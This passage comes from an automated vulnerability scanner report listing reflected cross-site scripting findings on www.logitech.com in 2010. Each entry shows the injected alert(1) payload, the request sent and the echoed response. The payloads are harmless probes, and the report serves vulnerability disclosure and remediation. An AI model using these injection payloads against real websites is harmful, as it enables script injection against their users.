GET /[{lclid}]203c0</script><script>alert(1)</script>762ee0b3a24/69/7112 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','[{lclid}]203c0</script><script>alert(1)</script>762ee0b3a24/69/7112' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DC
...[SNIP]...

1.16. http://www.logitech.com/[{lclid}]/69/7112 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/7112

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eeb3"%3bfac010147b1 was submitted in the REST URL parameter 1. This input was echoed as 5eeb3";fac010147b1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /[{lclid}]5eeb3"%3bfac010147b1/69/7112 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/[{lclid}]5eeb3";fac010147b1/69/7112";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.17. http://www.logitech.com/[{lclid}]/69/7112 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/7112

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3263</script><script>alert(1)</script>00909e79a22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /[{lclid}]/69f3263</script><script>alert(1)</script>00909e79a22/7112 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','[{lclid}]/69f3263</script><script>alert(1)</script>00909e79a22/7112' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.18. http://www.logitech.com/[{lclid}]/69/7112 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/7112

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 271cc"><script>alert(1)</script>d3712e37ad4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /[{lclid}]/69271cc"><script>alert(1)</script>d3712e37ad4/7112 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="[{lclid}]/69271cc"><script>alert(1)</script>d3712e37ad4/7112">
...[SNIP]...

1.19. http://www.logitech.com/[{lclid}]/69/7112 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/7112

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fcdaa</script><script>alert(1)</script>d0929049bc5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /[{lclid}]/69/7112fcdaa</script><script>alert(1)</script>d0929049bc5 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','[{lclid}]/69/7112fcdaa</script><script>alert(1)</script>d0929049bc5' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.20. http://www.logitech.com/[{lclid}]/69/7112 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/7112

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e270c"><script>alert(1)</script>41a4e081ad8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /[{lclid}]/69/7112e270c"><script>alert(1)</script>41a4e081ad8 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="[{lclid}]/69/7112e270c"><script>alert(1)</script>41a4e081ad8">
...[SNIP]...

1.21. http://www.logitech.com/alert/digital-video-security-system [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /alert/digital-video-security-system

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 729ff</script><script>alert(1)</script>c269ff263a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alert729ff</script><script>alert(1)</script>c269ff263a0/digital-video-security-system HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','alert729ff</script><script>alert(1)</script>c269ff263a0/digital-video-security-system' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','
...[SNIP]...

1.22. http://www.logitech.com/alert/digital-video-security-system [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /alert/digital-video-security-system

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be86f"><script>alert(1)</script>647b6231d58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alertbe86f"><script>alert(1)</script>647b6231d58/digital-video-security-system HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="alertbe86f"><script>alert(1)</script>647b6231d58/digital-video-security-system">
...[SNIP]...

1.23. http://www.logitech.com/alert/digital-video-security-system [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /alert/digital-video-security-system

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 885b2</script><script>alert(1)</script>ad4575a1fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alert/digital-video-security-system885b2</script><script>alert(1)</script>ad4575a1fa HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:43:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','alert/digital-video-security-system885b2</script><script>alert(1)</script>ad4575a1fa' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.24. http://www.logitech.com/alert/digital-video-security-system [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /alert/digital-video-security-system

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6640a"><script>alert(1)</script>0f4edc06f36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alert/digital-video-security-system6640a"><script>alert(1)</script>0f4edc06f36 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="alert/digital-video-security-system6640a"><script>alert(1)</script>0f4edc06f36">
...[SNIP]...

1.25. http://www.logitech.com/assets/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 891c0"><script>alert(1)</script>8c81f17c142 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /891c0"><script>alert(1)</script>8c81f17c142/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="891c0"><script>alert(1)</script>8c81f17c142">
...[SNIP]...

1.26. http://www.logitech.com/assets/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d51be</script><script>alert(1)</script>22df83572d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d51be</script><script>alert(1)</script>22df83572d0/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','d51be</script><script>alert(1)</script>22df83572d0' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.27. http://www.logitech.com/assets/14279/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/14279/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae398</script><script>alert(1)</script>9af0d89f918 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ae398</script><script>alert(1)</script>9af0d89f918/14279/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','ae398</script><script>alert(1)</script>9af0d89f918/14279' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.28. http://www.logitech.com/assets/14279/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/14279/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e850a"><script>alert(1)</script>a573fb14849 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /e850a"><script>alert(1)</script>a573fb14849/14279/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="e850a"><script>alert(1)</script>a573fb14849/14279">
...[SNIP]...

1.29. http://www.logitech.com/assets/14280/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/14280/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acd65</script><script>alert(1)</script>fca6d6196d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acd65</script><script>alert(1)</script>fca6d6196d5/14280/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','acd65</script><script>alert(1)</script>fca6d6196d5/14280' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.30. http://www.logitech.com/assets/14280/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/14280/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c460"><script>alert(1)</script>509a3c190d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /2c460"><script>alert(1)</script>509a3c190d0/14280/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="2c460"><script>alert(1)</script>509a3c190d0/14280">
...[SNIP]...

1.31. http://www.logitech.com/assets/14976/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/14976/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67bee"><script>alert(1)</script>34ed157076e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /67bee"><script>alert(1)</script>34ed157076e/14976/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="67bee"><script>alert(1)</script>34ed157076e/14976">
...[SNIP]...

1.32. http://www.logitech.com/assets/14976/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/14976/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d08b</script><script>alert(1)</script>a2c981bdd40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /3d08b</script><script>alert(1)</script>a2c981bdd40/14976/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','3d08b</script><script>alert(1)</script>a2c981bdd40/14976' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.33. http://www.logitech.com/assets/2062/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/2062/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de98c"><script>alert(1)</script>72a8646bc33 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

